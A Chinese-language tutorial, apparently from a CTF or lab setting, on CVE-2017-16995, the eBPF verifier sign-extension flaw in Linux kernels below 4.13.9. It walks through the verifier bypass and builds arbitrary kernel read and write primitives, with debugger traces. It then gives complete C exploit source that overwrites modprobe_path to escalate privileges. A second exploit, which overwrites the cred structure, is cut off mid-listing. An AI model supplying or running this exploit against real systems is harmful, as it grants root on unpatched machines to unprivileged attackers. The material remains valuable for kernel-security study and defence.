            u8 mode = BPF_MODE(insn->code);

            if (mode == BPF_ABS || mode == BPF_IND) {
                err = check_ld_abs(env, insn);
                if (err)
                    return err;

            } else if (mode == BPF_IMM) {
                err = check_ld_imm(env, insn);
                if (err)
                    return err;

                insn_idx++;
            } else {
                verbose("invalid BPF_LD mode\n");
                return -EINVAL;
            }
        } else {
            verbose("unknown insn class %d\n", class);
            return -EINVAL;
        }

        insn_idx++;
    }

    return 0;
}

BPF指令的校验是在函数 do_check中，代码路径为 kernel/bpf/verifier.c，do_check通过一个无限循环来遍历提供的 bpf指令。

漏洞分析

漏洞概述

漏洞存在于内核版本小于 4.13.9的系统中，漏洞成因为 kernel/bpf/verifier.c文件中的 check_alu_op函数的检查问题，这个漏洞可以允许一个普通用户向系统发起拒绝服务攻击（内存破坏）或者提升到特权用户。

漏洞分析

漏洞成因是内核在对 ALU指令和 JMP指令在检测时和真正运行的语义解释不一样导致。

理论上虚拟执行和真实执行的执行路径应该是完全一致的，如果步骤2安全校验过程中的虚拟执行路径和步骤4 bpf的真实执行路径不完全一致的话，则会发生以下问题，示例如下：

1.BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF),             /* r9 = (u32)0xFFFFFFFF   */
2.BPF_JMP_IMM(BPF_JNE, BPF_REG_9, 0xFFFFFFFF, 2),   /* if (r9 == -1) {        */
3.BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */
4.BPF_EXIT_INSN()
5.……

第一条指令是个赋值语句，将 oxffffffff这个值赋值给 r9；

第二条指令是个条件跳转指令，如果 r9等于 0xffffffff，则退出程序，终止执行；如果 r9不等于 0xffffffff，则跳过后面2条指令继续执行第5条指令。

虚拟执行的时候，do_check检测到第2条指令等式恒成立，所以认为 BPF_JNE的跳转永远不会发生，第 4 条指令之后的指令永远不会执行，所以检测结束，do_check返回成功。

下面我们分析一下do_check中对 ALU指令进行检查，check_alu_op函数会对操作数进行检查，该代码的最后一个分支处会对如下两种情况进行检查：

BPF_ALU64|BPF_MOV|BPF_K，把 64 位立即数赋值给目的寄存器
BPF_ALU|BPF_MOV|BPF_K，把 32 位立即数赋值给目的寄存器

if (BPF_SRC(insn->code) == BPF_X) {
    if (BPF_CLASS(insn->code) == BPF_ALU64) {
        /* case: R1 = R2
                 * copy register state to dest reg
                 */
        regs[insn->dst_reg] = regs[insn->src_reg];
    } else {
        if (is_pointer_value(env, insn->src_reg)) {
            verbose("R%d partial copy of pointer\n",
                    insn->src_reg);
            return -EACCES;
        }
        regs[insn->dst_reg].type = UNKNOWN_VALUE;
        regs[insn->dst_reg].map_ptr = NULL;
    }
} else {
    /* case: R = imm
             * remember the value we stored into this reg
             */
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
}

可以看到对于 BPF_ALU64或者 BPF_ALU最后都是将立即数 insn->imm赋值给 regs[insn->dst_reg].imm。而 imm是 32位有符号立即数：

struct bpf_insn {
    __u8    code;        /* opcode */
    __u8    dst_reg:4;    /* dest register */
    __u8    src_reg:4;    /* source register */
    __s16    off;        /* signed offset */
    __s32    imm;        /* signed immediate constant */
};

所以就导致当我们调用 BPF_ALU64|BPF_MOV|BPF_K指令时，传入的值是 0xffffffff给寄存器，会只是一个有符号的 32位数据。
而在 eBPF程序真实执行时，对这两条指令的解释如下(__bpf_prog_run)：

    ALU_MOV_K:
        DST = (u32) IMM;
        CONT;
    ALU64_MOV_K:
        DST = IMM;
        CONT;

可以看到 ALU_MOV_K，仅仅是将32位无符号的数传递给了目的寄存器，而 ALU64_MOV_X却是将立即数 IMM赋值给了 64位目的寄存器，这里如果 IMM是 32位数据，会对其进行一个 sign extension，导致这里 DST获得值与原 IMM并不相等。
所以在do_check检查时，这两条指令并无区别。但是在实际解释执行时，这两条指令的结果并不相同。运用这个差异即可对 do_check进行绕过。

在对 BPF_JMP|BPF_JNE|BPF_IMM指令解释时，当 IMM为有符号或无符号时，因为 sign extension，DST != IMM结果是不一样的：

    JMP_JNE_K:
        if (DST != IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;

但是，这是怎么确定在赋值时，会有符号拓展，从源码上我无法直接看到。所以还是得看汇编最好，真实执行时的汇编指令却如下所示：

 ► 0xffffffff81173e7f    movsxd rdx, dword ptr [rbx + 4]
   0xffffffff81173e83    and    eax, 0xf
   0xffffffff81173e86    cmp    qword ptr [rbp + rax*8 - 0x278], rd
   0xffffffff81173e8e    je     0xffffffff8117493c <0xffffffff81174

   0xffffffff81173e94    movsx  rax, word ptr [rbx + 2]
   0xffffffff81173e99    lea    rbx, [rbx + rax*8 + 8]
   0xffffffff81173e9e    movzx  eax, byte ptr [rbx]
   0xffffffff81173ea1    jmp    qword ptr [r12 + rax*8]
    ↓
   0xffffffff81174421    movzx  eax, byte ptr [rbx + 1]
   0xffffffff81174425    movsx  rdx, word ptr [rbx + 2]
   0xffffffff8117442a    add    rbx, 8
──────────────────────────────────────────────[ STACK ]────────────
00:0000│ rsp  0xffff88000f86ba30 ◂— 0xbd
01:0008│      0xffff88000f86ba38 ◂— 0
02:0010│      0xffff88000f86ba40 —▸ 0xffff88000fa61800 ◂— 0
03:0018│      0xffff88000f86ba48 ◂— 0xffffffff
04:0020│      0xffff88000f86ba50 ◂— 1
05:0028│      0xffff88000f86ba58 —▸ 0xffff88000ca32780 ◂— 0x183
06:0030│      0xffff88000f86ba60 —▸ 0xffff88000f86bc18 —▸ 0xffffc90
, eax /* 0x2e00020001 */
07:0038│      0xffff88000f86ba68 —▸ 0xffff88000f86bb30 —▸ 0xffff880
mov    ah, 2 /* 0xffffffff000002b4 */
────────────────────────────────────────────[ BACKTRACE ]──────────
 ► f 0 ffffffff81173e7f
   f 1               bd
   f 2                0
───────────────────────────────────────────────────────────────────
pwndbg> x/10xg $rbx+0x4
0xffffc90000093034:     0x000000b7ffffffff      0x0000009500000000

可以看到这里第一条指令赋值时汇编使用的是 movsxd，这就是会进行符号拓展。可以看到这里原本的值为 0xffffffff，但是执行完该指令，进行了符号拓展，真正赋值的值为 0xffffffffffffffff。所以，后续的第2条指令判断会永远不成立。

真实执行的时候，由于一个符号拓展的 bug，导致第2条指令中的等式不成立，于是 cpu就跳转到第5条指令继续执行，这里是漏洞产生的原因，这4条指令，可以绕过 BPF的代码安全检查。当安全检查被绕过了，用户就可以随意往内核中注入代码，也就能够提权。

漏洞利用

上述漏洞分析已经分析的很完整，即我们可以在输入的 bpf指令前4条指令用于绕过 do_check。在随后的指令中用于执行恶意指令。那么后续提权的恶意指令应该怎么布置呢？此处，以4.4.110内核版本进行exp的编写及分析。

BPF指令静态编写

这里讲述一下，如何编写 exp中需要是用到的各项功能。建议可以参考 linux源码中 sample/bpf目录下的示例，其给出了各项指令，只需要调用即可。

绕过do_check

    BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),               \    //mov32 r2, 0xffffffff
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),     \    //if(r2 == 0xffffffff){exit(0)}else{jmp 2}
    BPF_MOV64_IMM(BPF_REG_0, 0),                         \
    BPF_EXIT_INSN()

寄存器获取map值

BPF_LD_MAP_FD(BPF_REG_9, mapfd),        //r9=mapfd

#define BPF_GET_MAP_FD(idx, dst)                                                                    \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),        /*mov64 reg1, reg9=mapfd*/                          \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),       /*mov64 reg2, fp */                                 \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),      /*reg2 = reg2-4=fp-4*/                              \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),     /*(u64 *)(fp-4) = idx*/                             \
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), //获取map[idx]的值,r0存储返回值 \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),      /*if(r0 == 0){exit(0)}else{jmp 1}*/                 \
    BPF_EXIT_INSN(),                                                                                \
    BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0)      // dst = *(u64 *)(r0)=map[0]

r2存储map[2]地址

        BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0=&map[2]               */
        BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0 for exit(0)

获取栈地址

        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),                //if(r6==0){r2=map[2]=r10=fp}else{exit(0)}
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),        //*r2=map[2]=r10=fp
        BPF_EXIT_INSN(),

r10是 fp，其值是一个内核栈地址，r2的值是 map[2]的地址。相当于将 r10的值赋值给 map[2]

任意读

        //read
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),            //if(op==1)
        BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0x0),   // r3 = *(r7)
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),        // *r2=map[2]=r3=*(r7)=*(addr)
        BPF_EXIT_INSN(),

这里 r7的值是需要读取的地址 addr，r2的值是 map[2]的地址，相当于把 addr的值赋值给 map[2]，用户态读取 map[2]即可获得 addr的值

任意写

        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                            //*r7=r8
        BPF_EXIT_INSN(),

r7的值是需要写的地址 addr,r8的值是需要写入的值。
利用 r6作为指令判断，当map[0]输入为 0、1、2时，r6也分别为对应的值。

当 r6==0时，可以将 r7所指向的值赋值给 r2，而这里 r7的值由 map[1]控制，而 r2的值由 r0==map[2]，所以这里就相当于实现如下指令，能够实现一个任意地址读。

map[2] = *map[1]

当r6==1时，将r10所指向的值赋值给r2，而这里r10为rbp，也就相当于将rbp的值赋值给了 map[2]，可以读取栈地址。
当r6==2时，将 r8的值赋值给 r7所指向的地址，实现了一个任意地址写。

在用户空间创建的 map[0]用来存放操作指令，map[1]用来存放需要进行读写的内存地址，map[2]用来存放泄露的地址。

map[0].value = 0，表示读取 map[1]中存放的地址的内容，放到 map[2]中。这里就实现了任意地址读。

map[0].value = 1，表示读取内核栈基址，放到 map[2]中。这里就实现了泄露内核基地址。

map[0].value = 2，表示将 map[2]的值写入到 map[1]中的地址中。实现了任意地址写。

这里 r6用于 op，r7用于输入 address，r8用于输入或获取value。

利用方法

这里原exp中是使用覆写 cred结构体来提权。而这里已经实现了任意地址读和任意地址写，所以这里能够用于提权的方法十分多样，下面分别讲述两种提权方法：一种是简单的覆盖 modprobe_path，另一种即覆写 cred。

覆写modprobe_path

这种方法十分简单。首先需要泄露内核基址，这里由于我们有一个任意地址读，而经过调试 r10(即fp)的值加上0x28处的地址的值就是 __bpf_prog_run函数的返回地址。所以我们可以直接将返回地址泄露出来，以此来获得内核基址。同时，由于有一个任意地址写，所以可以直接向 modprobe_path的地址写上 /tmp/l.sh的16进制数字。完成覆写 modprobe_path。

下面是执行 r3 = *(u64 *)(fp+0x28); *(u64 *)r2=r3;指令时的汇编，可以看到此时 fp+0x28的值被存储到了 RAX中是返回地址 0xffffffff817272bc，而 r2此时的值为 0xffff8800077e59f0，该地址是 map[2]的地址，现在的值为 0。而执行完这两条指令后 map[2]的值已经变为返回地址0xffffffff817272bc。

*RAX  0xffffffff817272bc ◂— test   byte ptr [r13 + 2], 4 /* 0xad850f040245f641 */
 RBX  0xffffc90000002140 ◂— jnp    0xffffc90000002174 /* 0x327b; '{2' */
 RCX  0x28
 RDX  0x3
 RDI  0xffff8800077e5980 ◂— add    al, byte ptr [rax] /* 0x200000002 */
 RSI  0xffff88000fadfc8c ◂— add    al, byte ptr [rax] /* 0x4f16b58d00000002 */
 R8   0x0
 R9   0xffff88000b401600 ◂— and    byte ptr [rdx + 1], ah /* 0x1a220 */
 R10  0xffff88000fa9f300 ◂— 0
 R11  0xffff880000bec400 ◂— 0
 R12  0xffffffff81a33460 —▸ 0xffffffff81174779 ◂— mov    rsi, -0x7e5ccbc0 /* 0x4881a33440c6c748 */
 R13  0x0
 R14  0xffff880000bec400 ◂— 0
 R15  0x40
 RBP  0xffff88000fadfcb0 —▸ 0xffff88000fadfcf8 —▸ 0xffff88000fadfda0 —▸ 0xffff88000fadfdc0 —▸ 0xffff88
000fadfe38 ◂— ...
 RSP  0xffff88000fadfa30 ◂— 0x246
*RIP  0xffffffff811744a1 ◂— mov    qword ptr [rbp + rdx*8 - 0x278], rax /* 0xfffffd88d5848948 */
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff8117448c    shr    al, 4
   0xffffffff8117448f    and    eax, 0xf
   0xffffffff81174492    and    edx, 0xf
   0xffffffff81174495    mov    rax, qword ptr [rbp + rax*8 - 0x278]
   0xffffffff8117449d    mov    rax, qword ptr [rax + rcx]
 ► 0xffffffff811744a1    mov    qword ptr [rbp + rdx*8 - 0x278], rax
   0xffffffff811744a9    movzx  eax, byte ptr [rbx]
   0xffffffff811744ac    jmp    qword ptr [r12 + rax*8]
//返回地址
pwndbg> x/2xg $rbp
0xffff88000fadfcb0:     0xffff88000fadfcf8      0xffffffff817272bc
//r2存储的值是 map[2]的地址
pwndbg> x/10xg $rbp-0x278+2*8
0xffff88000fadfa48:     0xffff8800077e59f0      0xffff88000fadfa90
//执行前map[2]的结果为0
pwndbg> x/10xg 0xffff8800077e59f0
0xffff8800077e59f0:     0x0000000000000000      0x0000000000000000

//执行后map[2]中存储了返回地址，泄露地址成功
pwndbg> x/10xg 0xffff8800077e59f0
0xffff8800077e59f0:     0xffffffff817272bc      0x0000000000000000

覆写 cred

覆写 cred关键就是如何找到 cred所在的地址。这里最常见的思路就是通过任意读，不断爆破其地址，但是由于任意读每次只能读8字节，所以爆破稍微需要一点时间。然后参考别人的exp，又有两种思路：一种是根据内核栈地址，找到位于栈顶的 tread_info地址，其第一个数据就存储了 task_struct地址，再获得 cred结构体地址；另一种是根据位于 bpf_reg_1中的 skbuff结构体，其中存储了 task_struct结构体，然后获得 cred结构体。第2种，这里我不太清楚为什么 bpf_reg_1中会存储 skbuff地址，所以我不做讲述。重点使用第1种方法。

首先简述一下内核栈与 thread_info的关系。

由于task_struct随着版本的更新，其一直在不断增大，所以直接将 task_struct放入栈中会十分浪费栈空间，因此选择将 task_struct地址存储到 threadinfo结构体中，而将 thread_info放入栈中。thread_info结构体如下：

struct thread_info {
    unsigned long        flags;        /* low level flags */
    mm_segment_t        addr_limit;    /* address limit */
    struct task_struct    *task;        /* main task structure */
    int            preempt_count;    /* 0 => preemptable, <0 => bug */
    int            cpu;        /* cpu */
};

而 thread_info与内核栈 stack一起组成了一个 thread_union结构体：

union thread_union {
    struct thread_info thread_info;
    unsigned long stack[THREAD_SIZE/sizeof(long)];
};

#define THREAD_SIZE        16384
#define THREAD_START_SP        (THREAD_SIZE - 16)

内核定义了一个 thread_union联合体，将 thread_info和 stack共用一块内存区域。而 thread_size就是内核栈的大小，如下图所示：

那么内核是如何获取 task_struct结构呢，内核实现了一个 current宏：

#define get_current() (current_thread_info()->task)
#define current get_current()

/*
 * how to get the current stack pointer from C
 */
register unsigned long current_stack_pointer asm ("sp");

/*
 * how to get the thread information struct from C
 */
static inline struct thread_info *current_thread_info(void) __attribute_const__;

static inline struct thread_info *current_thread_info(void)
{
    return (struct thread_info *)
        (current_stack_pointer & ~(THREAD_SIZE - 1));
}

可以看到其获取了一个内核栈地址 sp，然后通过对齐 THREAD_SIZE就可以获取 thread_info结构的基地址了。这里的 THREAD_SIZE为 16384即 0x4000，所以后面用 0x4000来对齐。

所以这里如果想找到 cred的地址，可以先泄露一个内核栈地址，再通过对齐获得 thread_info地址，再获得 task_struct地址，最后获得 cred地址。

得到 task_struct之后还需要确定 cred在 task_struct中的偏移，这里目前没有找到好的办法，不同版本各有不同，需要自行调试。

EXP

覆写 modprobe_path

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

char buffer[64];
int sockets[2];
int mapfd, progfd;
int doredact = 0;

size_t kernel_base = 0x0;
size_t modprobe_path = 0xe4c800;

#define LOG_BUF_SIZE 65536
#define PHYS_OFFSET 0xffff880000000000
char bpf_log_buf[LOG_BUF_SIZE];

void Err(const char *fmt, ...){
    va_list args;
    va_start(args, fmt);
    fprintf(stdout, "[!] ");
    vfprintf(stdout, fmt, args);
    va_end(args);
    exit(1);
}

static __u64 ptr_to_u64(void *ptr)
{
    return (__u64) (unsigned long) ptr;
}

int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version)
{
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = ptr_to_u64((void *) insns),
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = ptr_to_u64((void *) license),
        .log_buf = ptr_to_u64(bpf_log_buf),
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries, int map_flags)
{
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries
    };

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key = ptr_to_u64(key),
        .value = ptr_to_u64(value),
        .flags = flags,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

int bpf_lookup_elem(int fd, void *key, void *value)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key = ptr_to_u64(key),
        .value = ptr_to_u64(value),
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

#define BPF_ALU64_IMM(OP, DST, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

#define BPF_MOV64_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

#define BPF_MOV32_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

#define BPF_MOV64_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

#define BPF_MOV32_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

#define BPF_LD_IMM64(DST, IMM)                    \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_LD | BPF_DW | BPF_IMM,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = (__u32) (IMM) }),            \
    ((struct bpf_insn) {                    \
        .code  = 0,                     \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD    1
#endif

#define BPF_LD_MAP_FD(DST, MAP_FD)                \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)


/* Memory load, dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */
#define BPF_JMP_IMM(OP, DST, IMM, OFF)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_OP(OP) | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Raw code statement block */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)            \
    ((struct bpf_insn) {                    \
        .code  = CODE,                    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = IMM })

#define BPF_EXIT_INSN()                        \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_EXIT,            \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = 0 })

#define BPF_BYPASS_CHECK()                                                       \
    BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),               \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),     \
    BPF_MOV64_IMM(BPF_REG_0, 0),                         \
    BPF_EXIT_INSN()                                     

#define BPF_GET_MAP_FD(idx, dst)                                                                    \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),        /*mov64 reg1, reg9=mapfd*/                          \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),       /*mov64 reg2, fp */                                 \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),      /*reg2 = reg2-4=fp-4*/                              \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),     /*(u64 *)(fp-4) = idx*/                             \
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),                              \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),      /*if(r0 == 0){exit(0)}else{jmp 1}*/                 \
    BPF_EXIT_INSN(),                                                                                \
    BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0)      // dst = *(u64 *)(r0)=map[0]

static int load_prog() {
    struct bpf_insn prog[] = {
        BPF_BYPASS_CHECK(),

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),        //r9=mapfd

        BPF_GET_MAP_FD(0, BPF_REG_6),       //r6=map[0]=op
        BPF_GET_MAP_FD(1, BPF_REG_7),       //r7=map[1]=addr
        BPF_GET_MAP_FD(2, BPF_REG_8),       //r8=map[2]=value

        BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0=&map[2]               */
        BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0  for exit(0)   */

        //get *(u64 *)(fp+0x28)=ret_addr
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),
        BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, 0x28),   //r3 = *(fp+0x28)=ret_addr
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),        //*r2=map[2]=r3
        BPF_EXIT_INSN(),

        //write
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                            //*r7=r8
        BPF_EXIT_INSN(),
    };

    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

void Output(const char *fmt, ...){
    va_list args;
    va_start(args, fmt);
    fprintf(stdout, "[+] ");
    vfprintf(stdout, fmt, args);
    va_end(args);
}

void print(const char *fmt, ...){
    va_list args;
    va_start(args, fmt);
    fprintf(stdout, "[-] ");
    vfprintf(stdout, fmt, args);
    va_end(args);
}

void init_bpf()
{
    Output("CVE-2017-16995\n");

    Output("bpf create map\n");
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if(mapfd < 0 ){
        Err("bpf map create Error\n");
    }

    Output("load prog\n");
    progfd = load_prog();
    if(progfd < 0 ){
        if(errno == EACCES){
            print("bpf_log_buf: %s\n", bpf_log_buf);
        }
        Err("Load progd Error: %s\n", strerror(errno));
    }

    Output("socket pair\n");
    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)){
        Err("create socket pair Error %s\n", strerror(errno));
    }

    Output("set sockopt\n");
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){
        Err("setsockopt %s\n", strerror(errno));
    }
}

static void write_msg(){
    ssize_t n = write(sockets[0], buffer, sizeof(buffer));
    if(n < 0){
        perror("Write");
        return;
    }
    if(n != sizeof(buffer)){
        fprintf(stderr, "short write: %zd\n", n);
    }
}

static void update_elem(int key, unsigned long value){
    if(bpf_update_elem(mapfd, &key, &value, 0)){
        Err("bpf_update_elem error %s\n", strerror(errno));
    }
}

static unsigned long get_value(int key){
    unsigned long value;
    if(bpf_lookup_elem(mapfd, &key, &value)){
        Err("bpf_lookup_elem %s\n", strerror(errno));
    }
    return value;
}

static unsigned long sendcmd(unsigned long op, unsigned long addr, unsigned long value){
    update_elem(0, op);
    update_elem(1, addr);
    update_elem(2, value);
    write_msg();
    return get_value(2);
}

void leak_kernel(){
    Output("leak_kernel:\n");
    size_t kernel_addr = sendcmd(1, 0, 0);
    kernel_base = kernel_addr - 0x7272bc;
    modprobe_path = kernel_base + modprobe_path;
    print("kernel_base: 0x%llx\n", kernel_base);
    print("modprobe_path: 0x%llx\n", modprobe_path);
}

void write_mod(){
    size_t t_name = 0x732e6c2f706d742f; // '/tmp/l.sh'
    size_t t2_name = 0x0068;
    sendcmd(3, modprobe_path, t_name);
    sendcmd(3, modprobe_path+8, t2_name);
}

void init_sh(){
    system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag\n' > /tmp/l.sh");
    system("chmod +x /tmp/l.sh");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/ll");
    system("chmod +x /tmp/ll");
}

int main(){
    init_sh();
    init_bpf();
    leak_kernel();
    write_mod();
    system("/tmp/ll");
    system("cat /flag");
    return 0;
}

覆写cred:

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

char buffer[64];
int sockets[2];
int mapfd, progfd;
int doredact = 0;

size_t cred_offset = 0x9b8;
size_t uid_offset = 4;

#define LOG_BUF_SIZE 65536
#define PHYS_OFFSET 0xffff880000000000
char bpf_log_buf[LOG_BUF_SIZE];

void Err(const char *fmt, ...){
    va_list args;
    va_start(args, fmt);
    fprintf(stdout, "[!] ");
    vfprintf(stdout, fmt, args);
    va_end(args);
    exit(1);
}

static __u64 ptr_to_u64(void *ptr)
{
    return (__u64) (unsigned long) ptr;
}

int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version)
{
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = ptr_to_u64((void *) insns),
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = ptr_to_u64((void *) license),
        .log_buf = ptr_to_u64(bpf_log_buf),
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries, int map_flags)
{
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries
    };

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key = ptr_to_u64(key),
        .value = ptr_to_u64(value),
        .flags = flags,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

int bpf_lookup_elem(int fd, void *key, void *value)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key = ptr_to_u64(key),
        .value = ptr_to_u64(value),
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

#define BPF_ALU64_IMM(OP, DST, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
